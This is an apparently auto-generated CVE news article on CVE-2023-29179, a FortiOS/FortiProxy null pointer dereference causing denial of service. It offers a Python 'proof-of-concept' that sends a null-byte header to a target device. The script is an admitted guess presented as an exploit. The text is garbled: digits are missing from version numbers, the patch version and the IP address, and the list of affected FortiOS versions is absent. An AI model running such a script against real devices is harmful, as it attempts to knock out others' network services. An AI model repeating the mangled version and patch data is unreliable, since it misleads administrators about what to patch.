CVE CyberSecurity Database News

CVE-2023-29179 - Exploiting a Fortinet FortiOS Null Pointer Dereference to Cause Denial of Service (DoS)

Poster -

Fortinet's network security solutions are widely used to protect business and enterprise infrastructure. Yet, like any complex software, they are not immune to security vulnerabilities. Let’s take a deep dive into CVE-2023-29179, a critical flaw in FortiOS and Fortiproxy, leading to denial of service (DoS) from unauthenticated attackers—with real-world code examples and step-by-step exploitation details.

FortiProxy versions 7.2. through 7.2.4 and 7.. through 7..10

This bug can be remotely exploited via specially crafted HTTP requests to crash essential Fortinet processes, resulting in a denial of service for legitimate users.

What is a Null Pointer Dereference?

In simple terms:
Imagine a computer program expects to find some information at a specific place, but that place is empty (a "null" pointer). If the program tries to use that empty spot, it can crash, much like someone stepping into an open elevator shaft!

Original Fortinet Advisory References

- Fortinet Advisory: FG-IR-23-099 – FortiOS null pointer dereference vulnerability
- NVD Entry: CVE-2023-29179 on NVD

How Does the Exploit Work?

1. Attacker crafts a malicious HTTP request specially designed to trigger a code path where the software tries to use a pointer not properly assigned.

The process handling the HTTP request tries to access memory that’s not there (null).

3. Process crashes, causing DoS: It could be the device's management interface, proxy, or other critical service.

> No authentication needed. No need to log in or know any secret. <br>> Just send the HTTP request(s) and the service can crash!

Proof-of-Concept: Crash with a Malicious HTTP Request

Let’s see how someone could leverage this issue.

Example Python Script

Disclaimer: Always test only on your own lab systems. <br>This script is for educational use only!

import requests

# Change this to your FortiGate IP/hostname
target = "https://192..2.1/";

# Malicious HTTP request, triggering bug (example malformed header)
malicious_header = {
    "Host": "bad.host",
    "X-Trigger": "\x00"  # Null byte in a header as an example
}

try:
    response = requests.get(
        target,
        headers=malicious_header,
        verify=False,        # WARNING: Don't do this on real connections!
        timeout=10
    )
    print(f"Received response: {response.status_code}")
except Exception as e:
    print("Error or crash triggered:", e)

*Note: The exact header or request structure may differ across firmware and services, but the key is introducing malformed or null values that the service does not expect!*


## What Does a Targeted FortiOS/FortiProxy Device Experience?

Admins may see event logs for process restarts or "Application Crash".

- For persistent attacks, this can result in repeated crashes, making management or proxy services unavailable—a severe denial of service.

Attack Scenarios

- Internet-Facing Management: If your FortiGate admin interface is open to the internet, an attacker can bring it down remotely.

FortiProxy: update to 7.2.5 or 7..11+

- Latest software downloads

More Information

- Fortinet Support Portal
- NVD CVE-2023-29179 Entry
- Original FortiGuard Advisory

Closing Thoughts

CVE-2023-29179 reminds us how small coding mistakes—like not checking if a pointer is valid—can lead to widespread service outages if exposed to the world. If your FortiOS or FortiProxy is listed among the vulnerable versions, patch it without delay!

Feel free to share this article to raise awareness, and always stay up-to-date with your security patches!

Timeline

Published on: 02/22/2024 10:15:07 UTC
Last modified on: 02/22/2024 19:07:27 UTC